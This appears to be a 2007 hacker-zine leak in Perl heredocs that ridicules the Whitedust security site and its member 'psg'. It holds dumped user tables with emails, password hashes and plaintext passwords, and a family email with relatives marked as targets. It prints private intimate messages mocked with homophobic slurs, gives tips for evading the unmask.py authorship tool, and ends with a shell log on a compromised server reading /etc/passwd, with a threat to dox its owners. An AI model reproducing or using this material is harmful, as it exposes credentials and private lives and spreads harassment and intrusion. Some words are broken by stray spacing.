`wd3_users` VALUES (31, 'jswray@hotmail.com', 'Hellz UK', 'd8578edf8458ce06fbc5bb76a58c5ca4', '472f465cf3d1097d6ae1cf585d74aa2d', 0, 1, 'host81-129-181-47.range81-129.btcentralplus.com', 'Wed, 01 Aug 2007 23:56:02 +0100'); INSERT INTO `wd3_users` VALUES (32, 'chunky_lover785@msn.com', 'NewWorldOrder', '6ccbdfc9c41f21c577331ce1b4c5875b', '8f241d7a198e764c5e95ea9e7697864 c', 0, 1, '5ac9ecc0.bb.sky.com', 'Tue, 31 Jul 2007 22:46:20 +0100'); INSERT INTO `wd3_users` VALUES (33, 'wajkas@gmail.com', 'wajkas', '70974db54da50ee0fa363c2b20eb46df', '64f75409f09dc05d7944740bbe4ec01f', 0, 1, 'vpn -gw.litnet.lt', 'Sat, 21 Jul 2007 17:07:13 +0100'); INSERT INTO `wd3_users` VALUES (34, 'necromancer.rob@gmail.com', 'necr0mancer', '43371c754833d6be991831ec2fa04687', '97840296bac872ae64479b21a65c7da e', 0, 1, 'c-76-98-108-129.hsd1.nj.comcast.net', 'Fri, 03 Aug 2007 06:16:05 +0100'); INSERT INTO `wd3_users` VALUES (35, 'trammel@cdc-nsf.com', 'trammel', 'd18ead8b5c3dd1dc37ce603455ecf474', '1a692f5451b312dcf328bf074fe6eacd', 0, 1, 'adsl-75-50-162-175.dsl.lsan03.sbcglobal.', 'Mon, 23 Jul 2007 23:55:49 +0100'); INSERT INTO `wd3_users` VALUES (36, 'kuza55@gmail.com', 'kuza55', 'ab3909976ec026ff9367f8927eded72f', '73595efe84a70c59a8ad7dca28bea02e', 0, 1, '58. 173.121.20', 'Thu, 02 Aug 2007 08:28:00 +0100'); INSERT INTO `wd3_users` VALUES (37, 'quorbeau@gmail.com', 'quorbeau', 'f5dd3bc2d6a0d7211312d316751bb5f3', '6615fa406f966169c453bb870b2a26ae', 0, 1, 'mo-71-1-109-220.dhcp.embarqhsd.net', 'Tue, 24 Jul 2007 19:28:14 +0100'); INSERT INTO `wd3_users` VALUES (38, 'rdx@chemist.com', 'Sniper223', 'f9e93130b80baea0f396e59d48400505', '2130dd61b965e603e7ddc60f046693d6', 0, 1, 't gtel18.eastky.net', 'Thu, 02 Aug 2007 13:25:17 +0100'); INSERT INTO `wd3_users` VALUES (39, '', 'el', '0b42e961db6b8add04df0b01ad5e7283', '', 0, 1, '83-71-12-6.b-ras1.dbn.dublin.eircom.net', 'Thu, 02 Aug 2007 01:09:11 +0100'); INSERT INTO `wd3_users` VALUES (40, 'alistair.lamont@gmail.com', 'f15h', '987061aee7171c3616c0ea82841f54b6', '8bcd0dbeb5544c2af6ad319d5db9dbd7', 0, 1, '63.110.187.40', 'Thu, 02 Aug 2007 22:11:13 +0100'); lol @ chunky_lover785@msn.com. These are the 40 elite hackers that form the WD hoard! But they aren't really 40. Notice how hakspace@hakspace.net, voshika@hakspace.net, and whitedust@hakspace.net are all represented alongside mark.anderson and mark.hinge. Who knows what aliases they have taken up to try to make it look like they have supporters. Here, see some of the people reading the WD newsletter! INSERT INTO `wd_newsletter` VALUES (19, 'sirukin@gmail.com'); ^^^^ sirukin got right on that INSERT INTO `wd_newsletter` VALUES (162, ''); ^^^^^ here be not WD parsing skillz INSERT INTO `wd_newsletter` VALUES (369, 'me@markanderson.ie'); ^^^^ omg site to hax INSERT INTO `wd_newsletter` VALUES (239, '\\"rapidshare login GENERATOR\\"'); <- lawl these get good INSERT INTO `wd_newsletter` VALUES (329, 'picklejuice@gmail.com'); ^^^^ I think we found ourselves a FAGGOT INSERT INTO `wd_newsletter` VALUES (317, 'msn pirate'); ^^^^^ kid you need an email address! INSERT INTO `wd_newsletter` VALUES (392, 'mark.anderson@whitedust.net'); ^^^^^ pretty late signup for the owner INSERT INTO `wd_newsletter` VALUES (443, 'redsand@blacksecurity.org'); ^^^^^^ how blacksecurity keeps up with the scene Check out how popular WD is! INSERT INTO `wd_polls` VALUES (9, 'Should Vulnerability\\''s Be Made Public?', 'Always', 'At Times', 'Never', '', '', 44, 23, 0, 0, 0); INSERT INTO `wd_polls` VALUES (5, 'Attending Any Security Cons This Year?', 'Nope', '1', '2-4', '4+', '', 65, 6, 1, 2, 0); INSERT INTO `wd_polls` VALUES (10, 'It is acceptable for a security patch to take...', 'Under a week', 'A week to a month', 'Over a month', '', '', 48, 22, 3, 0, 0); Check out the slashdot effect (and now you see why they try to trick slashdot into carrying their articles): INSERT INTO `wd_polls` VALUES (24, 'Do You Still Trust Firefox?', 'Yes', 'No', 'Not As Much', '', '', 2414, 346, 75, 0, 0); Check out some unhashed passwords! -- Dumping data for table `wd_users` -- INSERT INTO `wd_users` VALUES (7, 0, '|PaRiS|', '01j0uwwx1207', 'Male', 'Mr.', 'Mark', 'Hinge', 'mark.hinge@whitedust.net', 'United Kingdom', 'Inter net/Web Development', 'Computers/Software/Technology', 'Whitedust Security', 'Approve purchase', '1-9', 'University / Tertiary', '11/08/80', 'Other' , 0, 1); INSERT INTO `wd_users` VALUES (6, 0, 'cronus', '5landl0rd23', 'Male', 'Mr.', 'Mark', 'Anderson', 'mark.anderson@whitedust.net', 'Ireland', 'Internet /Web Development', 'Computers/Software/Technology', 'Self employed', 'Approve purchase', '1-9', 'High School / Secondary', '18/11/1981', 'Friend/Fam ily', 0, 1); INSERT INTO `wd_users` VALUES (44, 0, 'hawkwind', 'guiness', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); INSERT INTO `wd_users` VALUES (45, 0, 'cjz0r', 'badgers9191', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL , NULL); INSERT INTO `wd_users` VALUES (46, 0, 'smack', 'm00c0w', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL L); Check out the elite six character password of cDc's latest NSF member! OK enough DB. Nothing else fun at all, unless you think Whitedust news pages are fun. And if you do we probably don't want to know you. It's time for some less Cronus and more psg. psg's emails are boring. Lots of spam. Lots of lame myspace/facebook/securityfocus/eveonline. And he deletes stuff quickly (score one for psg!). So this is about the only thing to entertain you at all, our little Hinge family get together for a murder mystery. Return-path: Envelope-to: mark.hinge@whitedust.net Delivery-date: Sat, 04 Aug 2007 12:06:42 +0100 Received: from web86611.mail.ird.yahoo.com ([217.146.188.208]) by gorlois.blacknight.ie with smtp (Exim 4.60) (envelope-from ) id 1IHHSv-0005hu-Ta for mark.hinge@whitedust.net; Sat, 04 Aug 2007 12:06:39 +0100 Received: (qmail 50235 invoked by uid 60001); 4 Aug 2007 11:06:37 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=btinternet.com; h=X-YMail-OSG:Received:Date:From:Subject:To:Cc:MIME-Version:Content-Type:C ontent-Transfer-Encoding:Message-ID; b=ZThooFV+FK1oQRW5zpoubx0AgulTVw9Oa1cIN38tbLEAN9+lpTtLHn+o4ZdQKG008tYtd7pC KOzT3WOvwIR6UNgobA2xA5kXA4axyd9G0WU3xfvFoHCJHNSjpM1Qt1t1vXCk4+Goqpi5T4 qFDDmu8ipZkO9bXnvlIqtF41kGdt8=; X-YMail-OSG: nyKJkQkVM1nufe4xjeLFQwzBJRPuN1DmH4nNZrKi Received: from [86.152.13.153] by web86611.mail.ird.yahoo.com via HTTP; Sat, 04 Aug 2007 12:06:36 BST Date: Sat, 4 Aug 2007 12:06:36 +0100 (BST) From: CHRISTOPHER HINGE <- TARGET 4 U Subject: MURDER NIGHT! To: linda leech , <- TARGET 4 U Rosie Hinge , <- TARGET 4 U Mark Hinge Cc: C Hinge <- TARGET 4 U Does anyone want the "Murder Mystery AUG 2007.pdf" that came with it? psg's myspace account is much more exciting. Fun stuff down there. Let's start by showing off his fake hacker highlights. ######################################## From: st3x http://www.myspace.com/st3x Date: Mar 17, 2007 2:58 PM Flag as Spam or Report Abuse [ ? ] Subject: UK Scene Body: Hey man, I just read your reply to my blog comment. I really want to do everything I can to facilitate the growth of the UK scene. It's only in the last 6 or 7 months that I've started to look into the UK scene - I guess there comes a point where everyone wants to associate themselves with people like themselves through choice rather than through courtesy formed from proximity. I've met a few people over hvr, and have tried (and failed) to arrange a meet in Leeds. I'll be frequenting the Manchester 2600 meet for the first time this month, but I really want to bring new people to the scene. I figured that a good place would be to start would be looking at activist groups in the UK (especially Human rights groups) from all different areas, introducing them to programs such as Torpark and scatterchat and getting them to acknowledge the importance of the internet as a means of communication and organisation. From this collaboration I hope people with similar interests to ourselves, who shy away from particular 'agendas', will see that there is a society without such alliances that they can fall back on. Maybe that last point isn't so clear? When I went to Uni I ended up getting involved with the Socialist workers party. I felt like I wanted to get 'involved' and they swept me up. After a while I realised that they weren't for me and left - only to get approached by the anarchist federation and then worlwiderevolution. All the time, I felt a need to get involved, but never found the 'UK Scene' to facilitate it. I've got more from the US 2600/EU scene in the last 6 months than I did from 3 years in association with these groups. You are without a doubt, a key member of the UK scene. I've seen your name on every portal I've visited, so I need to ask you - do you think I've got a chance? What do you think of my plan? You are obviously involved a lot more than me, and if you think my efforts would be put to better use, I'll happily take my lead from you. I know that sounds a bit sheepish, but I really want help build the scene, for the scene and the people yet to come. This is bigger than you and me, but you have been involved for longer and will have a better understanding of what it needs. I look forward to hearing from you. Best wishes, st3x ######################################## WE HAVE IDENTIFIED THE SPECIFIC BEST DAY OF PSG'S LIFE From: PSG Date: Dec 17 2006 7:02 PM The book came out and i am in cult of the dead cow. this is all. ######################################## And that is all of psg's fake hacker lifestyle. The rest is the home life! ######################################## From: PSG Date: Dec 18 2006 11:14 PM I cleaned and polished and dusted etc etc as well and mopped (obviously). We need a new mop though. And if you cna get some salad/lettice from tesco's on the way home (there is no money in the house) and I will make nice kebab things for dinner. Oh tomato's as well. I've fixed the network as well -should- be fine; works on the media center. Where is my lunch hidden? xxx ^ The daily activities of a hardcore fake hacker ######################################## From: PSG Date: Dec 19 2006 12:18 AM You are getting all my money when I get paid at the end of the month - as per. What you then do with that money is up to you. Because that is what WE agreed. Whatever you told Laura has nothing to do with me because it wasn't what I agreed so don't really want to hear about it :) x ^ psg tells his hooker to keep her mouth shut I ONLY PAID YOU TO SAY I HAVE A BIG DICK NOW STOP TALKING ABOUT LAURA AND OPEN YOUR MOUTH ######################################## lol! couldn't have put it better myself! the main point of this is that we'll be fine. worst comes to the worst, we find somewhere with one nice big bedroom for £700 a month including bills, which is only £100 more than we're paying now, and which we'll both soon easily have. and we get all the excitement of moving all over again. and she will be back at home with her parents doing her washing. again. checking it out, they even have places exactly like that on our road, and the road in between that links our side with jon and claire's side. we're going to be fine. she, on the other hand, can do as she damn well pleases :) did you find your food? smiles and kisses :) xxx ----------------- Original Message ----------------- From: PSG Date: Dec 18 2006 11:46 PM You don't have to explain to me. she's an idiot. but when push comes to shove... if she doesn't want to, WE are not the one's who will have to go home :P we can find somewhere between us on the evidence of the last few months, she'll be stright back home... and adrian and her... well she needs to think before she opens her trap. ^ psg turns around and starts talking about LAURA! ######################################## From: PSG Date: Dec 19 2006 10:43 PM Computer less gay now. I think someone has been snooping around on our network which explains the problems with the Wireless. Fixed now anyway. All very odd. Anyways... tired. Hungry. x ------------------------------------------------ From: Maria Date: Dec 19 2006 6:47 AM Kick their snooping ass :) - yes. Steve just text to find out if your phone's broken :P I told him you probably just didn't want to talk to him. He thought I was joking. - i ignored calls because i am meh and then he txt wanting to go for lunch his shout, but i still cannot really be bothered. adrian wanted me to go somewhere this evening as well but again, meh. I'm not hungry at all today, but I'm definitely sleepy. If you want I can grab us a film or something on the way home, and we can finish off those biscuits after dinner and have a really nice night? Lots of stroking and cuddles and stuff? - that sounds nice. x ps. can we pls have no arguing :( xxx ^ We haxed you, now your wireless does not work so well! ^ I REQUEST STROKING AND CUDDLES AND NO ARGUING ######################################## See, psg has some relationship problems. It would be cruel of us to paste his personal conversations with his girlfriend here. So here they are: ######################################## ----------------- Original Message ----------------- From: PSG Date: Dec 15 2006 6:39 PM Not sure what to do tonight :) Would it be ok if i went back to bed now, I might die. ^ psg does not want sexy time! I'll msg you when I wake up. Love you, Everything is fine. xxxx ----------------- Original Message ----------------- From: Maria Date: Dec 15 2006 6:31 PM Alright, so you're not that bad :P I know you know I'm there if you need me, but I also know there's a lot of things that other people can/could understand or help you with that I can't, not because I don't want to, but because I don't know how to, and I don't even know if you'd want me to try. But I'm still there, and if you want to even talk or anything I'm happy to listen, although I can't help. As for this week, I'm proud of you, and you know I am. I'm sorry I've had worky stuff going on as well, so I haven't necessarily voiced it as much as I maybe should have. I want you to feel happy, because you're amazing and you deserve to :) And please stop saying you think I'm thinking about leaving you. I know we fight and stuff, but you're the best thing to ever happen to me, because you're the only person who would give me the chance to settle down and relax, even though I'm not the easiest person to deal with sometimes, and I fully acknowledge this. I don't think anyone else could have done. The only thing you said wrong there was that i KNOW you want me. I don't. As far as we go, that's the only thing I need reassurance on, ever. I know we will fix this eventually, and I know you've got a lot else going on, and I know I'm probably focusing on this because everything else is SO perfect, but maybe thats just what I do! :) The only reason I tried to explain to you how personally I take it is so you know why I react the way I do, and you understand how upset I get just so you can tread gently around it and avoid any arguments...it wasn't meant to be any sort of personal attack on you. I'm just a bit scared by the idea of everything being fine, cos then things can only really get worse. I'm negative, and I'm sorry. I want all that stuff as much as, if not more than you do. Wow. You're amazing. And I think I love you more, I' just much worse at showing it! :) You wanna go to the pub tonight and then just go home? I mean, if you want other people to come back that's cool, but I'm up for drinking then coming home if you are? Feel free to pick up a bottle of something today if you're out so we canstart before we leave! xxx ----------------- Original Message ----------------- From: PSG Date: Dec 15 2006 6:07 PM Just relax... don't try. You're here and nice and safe with me; you know I wouldn't do anything to actually hurt you, you know I will always be here... try not to focus on the one thing that isn't 100%. I have never tried so hard to be such a good boyfriend, indeed friend to someone. I love you. I am over whatever problems I had now; I just want you to feel like you can behave normally and don't have to plan things or get overly upset when the plan you've made doesn't go exactly the way you thought it would; you can have me for the rest of your life; a few nights, even weeks will make little difference... this problem will sort itself out over time being as it is born out of pervious circumstances (both of ours). ^ lol we'll see about that! I understand you want to come home and things just happen and tbh I'd like that too; not overly comfortable with the hippo on the sofa around but tbh I could easily get over that! But please please please try to understand that I have a lot going on work wise etc atm and although I am cool calm and collected on the outside you can't even imagine the mess in here... It takes me a while to wind down after work. I am currently redrawing up a lot of the rules and direction I had in life; to incorporate a few new feelings I have, many of them to do with you (see later on in this msg). Someone very very close to me died less than two months ago; I am still finding that hard to deal with, in many respects as I am the friend other people go to when they need to talk, I tend not to talk to them about my issues, on some levels I feel like I don't have anyone to talk to anymore. And I know you'd do anything to help me :) but I just need an external kick up the ass sometimes and I am having to get used to the fact that the person I used to rely on to do that isn't here anymore. ^ So you talk about your issues online to other myspace ladies! I miss them. It's going to take time. In the last week I achieved two of my major ambitions in life; and I think I deserve to be able to feel a little happier about them than I do this morning. What I've done this week, to me, is like being chosen for the Olympics if I were a runner or elected to parliament; it justify's everything iv've ever done and sacarificed to get here. ^ Those two ambitions were End of Dayz being published and the cDc invite! ^ psg needs to achieve some real life goals Sex isn't a big deal atm because I have so much going on; but I garuntee you it will be again! OBVIOUSLY! Deep down you KNOW I want you. And with all due respect, the fact I want to have sex with you is NOT the reason you are my girlfriend. The reason you are my girlfriend is everything else about you that I love. The fact I find you very attractive (Random Fit Girl) is part of that yes, but it's not the major reason I am with you. I am with you because of the person you are not what you look like. You make me want to have babies and weddings and a patio and matching dinner sets. No one else has ever and likely will ever manage that; it's a part of me I did not think existed. I'd give up everything to make that happen - you and me are the most stabilising reassuring thing that has ever happened to me. You're not an idiot, but you do just need to trust me and stop worrying so much - but I can wait for you to do that. ^ Trusting psg is bad, we will see! I just need you to be gentle and understanding back sometimes when I lack in certain areas. I love you more xxx ######################################## Three months later the problem was not resolved! Remember that the _bottom_ post is the first. ######################################## I wasn't asking for a well structured argument from you. I'm already well aware that you're an incredible boyfriend, and that sometimes you just w ant to talk, etc, and I appreciate that a hell of a lot more than I think you realise. I think any girl would. All I was asking for was for you to understand why I get so upset, and why I hate being scheduled in for the end of the night, just in case you HA PPEN to feel like it then. Hows about you try just relaxing, thinking about it, and maybe let someone else make you WANT to do things like that? Or even if you don't want that, try thinking that maybe the other person might quite like it if you just showed them that sort of attention, and p referably not on the one night they're incapably drunk? I don't think any couple ever got by on the premise that it's always one person's entire c hoice what happens and when. People don't always want the same thing at the same time. That's a human fact, shouldn't be something that's allowed to undermine an entire relationship, which, lets face it, this is doing. I don't have any complaints at all about what goes on whenever stuff does happen, but maybe if you were nicer to me it wouldn't bother me that it' s not as often. Seeing as I'm being seriously honest here, whenever we start anything I never know from the beginning whether you're even going to come near me or not during it. Maybe if that were different it wouldn't bother me so much how often it was, but I'm not allowed say that cos then you get all 'unrelaxed' and accuse me of pressuring you. I can't really win. Doesn't matter any more anyway. Like I said, your call. We've tried to fix this so many times and I have no energy left for it. We can either leav e it altogether, or I'll just accept thing as they are and won't ever ask any questions about whatever else goes on. Because I love you enough to make THAT sort of a compromise. I'm not supposed to have to say this, it's something you're supposed to work out for yourself. But this is so easily fixable, it's just not me tha t can do it any more. So the ball's kind of in your court. Love you though x ----------------- Original Message ----------------- From: PSG Date: 02 Mar 2007, 14:27 > Look, I don't know exactly what's going on right now. Nothing is going on - I am very stressed about work and that about it. Unless there is something going on with you that you haven't told me about? ^^^^^ I thought you were over your problem? > All I'm asking for is the same thing that every other girl in the world wants....a nice bloke, who like her, and who'll occasionally do nice thi ngs like cook, who doesn't think any sort of physical intimacy with her is the worst thing in the world, and generally just wants to be with her. You have a nice bloke - who do you know who is as nice as me? Who loves you and will do anything you ask him to do. I don't think physical intmacy is the worst thing in the world - saying that is just stupid - sometimes I just want a hug and to sit and TALK with you thought, because I love y ou... I do want to be with you; I am running out of ways to explain that to you. ^^^^^ I think we've found ourselves a FAGGOT > I thought we had all that, except for one thing. And I can usually deal with that. I don't understand it, and it upsets me, but I can deal with it as long as it isn't brought up and constantly rubbed in. You know this cos we really had a nice few weeks. And that's cos I love you enough to let that one stupid thing go, cos I kept thinking one day we'd fix it...either when we left your grandad's, or when I moved job, etc. There is nothing to fix. I love you I fancy you, if you stopped worrying about it for 10 mins then it would be fine, as it is I feel under pressur e; it need not be like that at all. ^^^^^ I think she thinks there is something to fix. Like...your sex life! > But today I'm sitting here feeling the worst I think I have felt since I've been with you, cos I don't understand how me getting upset about one such basic thing which you keep telling me is fixed anyway can result in you being so upset and having such a go at me, it doesn't seem very fair . I was not upset. That was well beyond my control. I did not want that to happen did I? And I never had a go at you; I just need you to understand. ^^^^^ I'm not beating you, I'm just making you understand! > If the very thought of having to come near your girlfriend makes you as unhappy as you were last night, then maybe you need to find yourself ano ther girlfriend. That's ridiculus. I don't want anyone else; and I got upset because you shouted at me for going to turn the heating off. Nothing to do with coming near you which I quite wanted to do at the time before you screamed at me in front of Adrian. > I just hate feeling like this. I'm not the most unattractive person in the world, You're beautiful. >and I'm not the worst girlfriend, I am far from the worst boyfriend. ^^^^^^^^ Stick up for yourself when you don't need to, huh? > and I hate that last night you were so upset, I don't know why that happened. > when I'm sure there's a thousand other girls who have done a thousand times worse. And yet Charlotte just took me shopping to try and cheer me u p and I ended up in tears in a changing room cos some stupid pair of trousers didn't fit, and that's not what I do. Being as upset as last night isn't generally what I do either. > I know you need to relax before we can be okay, but I've tried so hard to help you do that, and it hasn't got anywhere, and now I'm so paranoid that I can't relax either, and I need fixing, That's what I am good for. ^^^^^ Apparently not. > and you'd rather leave me or let me leave, because that's how much you don't wanna come near me. That is not true at all. ^^^^^ It's worse than we thought. psg has straight-sex-aphobia. > Basically I'm saying this can't be fixed through trying to make each other relax, cos I'm not in a position to try and relax you any more, and I 'm pretty sure that you're not going to try and relax me...as you've said yourself, if you don't want to you're not going to. Point taken. I will do my best; I am sorry ok? :( > We either completely leave this whole sex thing, to the point where if you wanna sleep with other people thats fine, I just don't wanna know abo ut it, or we just leave the entire thing. Your choice. I don't want anyone else. xxx ------------------------------------------------------------------ maria -> psg Just in case you were about to reply to that last message, please don't bother. I've just been really sick, I'm completely exhausted, and my head' s just fuzzy, I don't wanna talk to argue or anything any more. I'm going to come straight home after work, have a shower, get changed, etc. If I feel any better, I'm going to go to the pub, you're more than we lcome to either come or go out with your friends. If I don't, I'm just going to go to bed and hope I wake up tomorrow feeling okay. Likewise, don' t feel obliged to stay with me if you wanna go out or whatever. I'll see you at half five. Any vaguely nice response to this would be appreciated. ######################################## I do feel sorry for Maria, and sincerely hope the two of them live happily ever after. She sounds ever so nice. Unfortunately here's where we show you what psg would rather be doing with his time: ######################################## I love you Mark. If you were a girl, you would be mine. ----------------- Original Message ----------------- From: PSG Date: Feb 19, 2007 11:13 AM If your intentions are that of the light then you hinder not - you nor I see the full consequences and benefits of our actions, all we have to do is that which we feel is right. You emotions are you ally - not your enemy. If they get involved, enjoy the moments. Life is but a series of moments; how you remember them, and ultimately it is a choice you can make. Realistically what do you have to fear? There is nothing stronger than what you have right there in your soul. Relax. It's fun. -------------------------------------------------------------------------- ------------------------------------------- True. But sometimes I help and I hinder, and when I hinder I help. That is still the tricky part, and not considering my emotions sometimes get in volved. Natural right? I hope I do right then, but fear is the mind killer. ----------------- Original Message ----------------- From: PSG Date: Feb 19, 2007 5:09 AM Do what comes naturally. Nothing more. Help those who cannot help themselves. It -is- your responsibility. That's the heart and center of it. Heart, soul and center. ######################################## Do not be fooled: Those above messages were sent to A MAN. psg is having problems expressing himself to his girlfriend and getting in bed with her... but maybe he's just trying to win over this gent? Next up, his first gay experience (just before the first issue with his girl) ######################################## From: PSG Date: Dec 15 2006 1:23 AM It says if eyes sting or burn see a doctor. That's a bit extreme so i just won't use it again :/ I washed my eye out. It feels a bit better. :X ######################################## Thank you thank you, we'll be in town all week. On a serious note, we decided to, yah know, well...not rm everything. This shouldn't seem like much of a surprise, because we don't do much rming to begin with. But psg was so tempting. You just know that even after getting owned they'll lie about it. Hard to do that when you've got a big void where all your websites used to be. That was the nice thing about seeing hakspace defaced. However, we're friendy, helpful hackers. We are an educational zine! There are about three dozen clueless 13 year old talentless virgin php coders out there who buy into these guys, and we hope some day they will grow out of it peacefully. But that's just a joke, not a real reason to not rm whitedust. These guys are hurting themselves. They are crashing and burning, step by step. They had a bit of success when they first started and were modest in their content, and when slashdot didn't yet know not to link to their articles. But they've got worse and have also been slowly discovered as the frauds they are, by many people. According to them, 2007 has held many more hits than 2006, but if that is true then it's just a sign of being known, while underneath that topsoil the hollow hole that forms their content base continues to widen. "Never interrupt your enemy when he is making a mistake." - Napoleon Bonaparte I personally would rather watch Whitedust crumble and die entirely through its own lack of quality, in a slow and painful death that depresses psg, instead of taking it out and giving him an out. But that's just my opinion, not necessarily yours. I'm not one to tell others what to think... These guys know nothing about security, and have nothing of quality to contribute, yet they are trying to plagarise and create security news. If they do get better and survive, then good for them. The system works, and we have once again done our jobs as internet superheroes. UPDATE: psg quit. Congratulations to Whitedust, psg, and everyone else! Now we await Cronus quitting. EOWHITEDUST );} sub Unmaskunmask { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOUNMASK' unmask.py blows. The code is shit. Considering that it is only one of seven sources listed on http://www.immunitysec.com/resources-freesoftware.shtml, and that the others are mostly Python too, we can reasonably conclude that Dave Aitel codes like shit. Maybe if you pay for non-free software from Dave Aitel you will get something better. "By releasing tools, such as these, we hope to demonstrate our knowledge leadership, and give back to the security community as a whole." It is horribly incomplete and doesn't do all the things it says it does. You are better off entirely ignoring the comments Aitel wrote, because they are LIES. How could he give this a 1.0 version number? It isn't even 0.1 unless you're living in the 90s. Here's how it actually gets a score from two stores: --- Take the 100 most common words from both and compare. Add the amount that match. So, that's a possible 100 points. Take the 100 most common (continuous or non-continuous) doubles in sentences (where the phrase "I like dogs. I am." would form doubles of "I like", "I dogs", "like dogs" and "I am"). Add the amount of those that match. Do the same for triples. --- So you have a highest possible score of 300. Don't be fooled into thinking scores are a percentage. It entirely ignores punctuation, sentence length, and other things he said were used. Now, take me for example. I try to write short sentences using simple words. So my singles list is packed with words that are less than five chars long. These, from two texts, match at a ridiculous rate. Look at this paragraph itself, words including "take me for I try to write words so my list is with that are less than from two at a", most of those 20+ words will be in my most common word lists in both texts. Then take the doubles and triples. It would make a bit of sense if it was only continuous words, but it isn't. So in anything except for very short sentences, all the doubles list suggests is, again, your most common words. My doubles list would be full of combinations of the above example short words. It's basically taking how similar your basic vocabulary is and multiplying that by three. ---- Here are some ideas to cause unmask fun: In one text, write always with "I", and in the other always write with "we". Use very short sentences. That will leave your singles almost the same but will destroy your doubles and triples values, so you should be able to drop your score 10 points in a bad situation and much much more if your sentences are short enough. Misspell common words and they will be cut out of the results, lowering your scores in general. See, Aitel was a dumbass and decided to not match words that aren't words. I can understand how he wants to remove non-text data, but even if he just held onto text that matched something like /\b[a-z]{5,}\b/ he could catch a lot of words that are spelt wrong and would increase the accuracy of his script. Unfortunately, regex is probably a bit too much for Aitel in general. Ever wonder why it takes so long to build such massive stores? Ask yourself, did Dave Aitel think to just store the most common 100 keys of his lists (the data he actually uses), or did he decide to store everything? Ask yourself, if I add one word to a sentence, although that will create just one more single item, how many more doubles and triples will it create? Could I possibly make unmask.py hang for half an hour and take up 50mb with just a short essay that lacks punctuation? ---- It is interesting that the script works pretty well. The reason is does so is because vocabulary does mean a lot. By compounding it he expands the differences between different people. The more you match, the more your score will increase by in a non-linear way. So even though X writes good english fairly similar to mine, the small differences may account for 25-40 points. On the other hand Y writes with entirely different english that I do, and might sit just 50-60 points back of me. For example with a certain small text of mine as a baseline, another writing by myself got about 85, one by X got 62, and one by Y got about 45. So even though X writes much more like I do than like Y does, his score is closer to that of Y in comparison to me. Something to note is that there are some really obvious words, like "a", "the", "I", etc, that everybody will use, and thus common doubles (not so much triples, but still some), so any two people comparing each other should get something like a 20 score basically by default. So subtracting that from the above, it's like I had 65, X had 42, and Y had 23. The small differences between X and I still lead to such a big variation because of the non-linear function that makes comparisons: I don't just have more of the same words, I thus have more of the same doubles and triples. The fact that X got that close to me (64% of my score), even after subtracting an arbitrary default value of obvious words, is a testiment to just how comparable the rest of our basic vocabulary is. People with english as a second language, even if writing technically proper english, may rely on specific words a lot and completely avoid other obvious ones (like 'got' for 'have', or so). So they could match themselves extremely well and match others very poorly. So here are some good and accurate excuses if some random guy matches you: - unmask.py is crap - Two people with a strong command of english who use a lot of conjunctions and common verbs with ease could have a very strong correlation. - People that have a very limited vocabulary will have their top100 lists padded by less common words, and will match less in general. - By knowing and using a mass of small words at the expense of long words, you increase your match potential in general. - Most of the long/odd words used won't make it into the top 100 lists that are used for comparison. - Vocabulary testing is a good idea for people of different nationalities and education levels, but for people of the same ones, it's very cheap. - This is entirely vocabulary, and doesn't even test that, just compares the most popular words. EOUNMASK );} sub Clpwn { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOCLPWN' Well, these kids hit the scene very recently. Whilst we appreciated their belittling of whitedust/cronus, we do not appreciate some of the shit they are pumping out, especially regarding the full disclosure mailing lists, talking shit in IRC and the general way they write their blogs. Some of the blogs and quotes you can dig up on their site actually made us question whether the site is a joke. We decided to put those thoughts to the back of our mind and own them anyway. These guys talk about XSS like its an OpenSSH remote root. Lets take a peak at some lol quotes. ##Quote 1## In the early hours of Monday August 13th, the servers of CNN International were hit by a devastating cross-domain injection attack by a group of blackhat hackers identifying only themselves by the mysterious acronym 'CLPWN'. ----> devastating cross-domain injection attack -> XSS ----> blackhat hackers(CLPWN) -> media attention seekers ##Quote 2## "Experts say that the hacking group, funded by unknown sponsors and with no official spokesperson or representative in the media, appears to be highly sophisticated and dedicated to attacking only high profile and popular web sites." -----> Experts -> wtf? CLPWN writes these blogs themselves :/ -----> highly sophisticated....in the art of ./xss_fuzz ##Quote 3## "Industry insiders state that Team CLPWN may be a loose coming together of some of the world's most notorious blackhat hacker groups, and that the skills and capabilities of such a group are unlikely to have ever been seen before in the security and hacking worlds." -----> Not needed here really, this is universal in all languages...pure and simple LOL material. We are not actually sure if this site is a joke. If it's not then we have just owned some truly mixed up kids. Attention CLPWN: Blackhats don't post bugs. Fair play for giving Cronus shit, but you need to be set straight, stop posting to FD, stop seeking the media and finally stop writing about yourselves like you owned Bill Gates with one of your el8 XSS's. I guess its tim'e to drop some of these bitches' dox :) $ uname -a Linux assmule.apisnetworks.com 2.6.22.1 #3 SMP Fri Jul 20 16:28:51 EDT 2007 i686 i686 i386 GNU/Linux ##up2date Who's around? $ w 11:57:11 up 24 days, 9:25, 1 user, load average: 1.36, 0.86, 0.69 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/4 mrchainsaw.apisn 00:36 1:06m 0.18s 0.18s -bash Who calls this shithole home? $ cat /home/virtual/site177/fst/etc/passwd clpwn:x:683:683:clpwn.com:/home/clpwn:/bin/bash root:x:0:0:root:/root:/dev/null sshd:x:74:74::/var/empty/sshd:/dev/null apache:x:48:48::/var/www:/dev/null mail:x:683:683:mail:/var/spool/mail:/dev/null postfix:x:101:101:postfix:/var/spool/postfix:/dev/null nobody:x:99:99:nobody:/usr/share/empty:/sbin/nologin mysql:x:100:100::/var/lib/mysql:/dev/null tomcat4:x:88:88::/home/tomcat4:/dev/null majordomo:x:683:683:Majordomo List Manager:/usr/lib/majordomo:/dev/null ftp:x:683:683:ftp:/home/ftp:/bin/bash smmsp:x:51:51::/var/empty/smmsp:/dev/null bhs:x:23169:683:blackhatscan:/home/bhs:/bin/bash jf:x:23194:683:jason f:/home/jf:/bin/bash bpzp:x:23195:683:bpzp th4 clpwn:/home/bpzp:/bin/bash $ cat 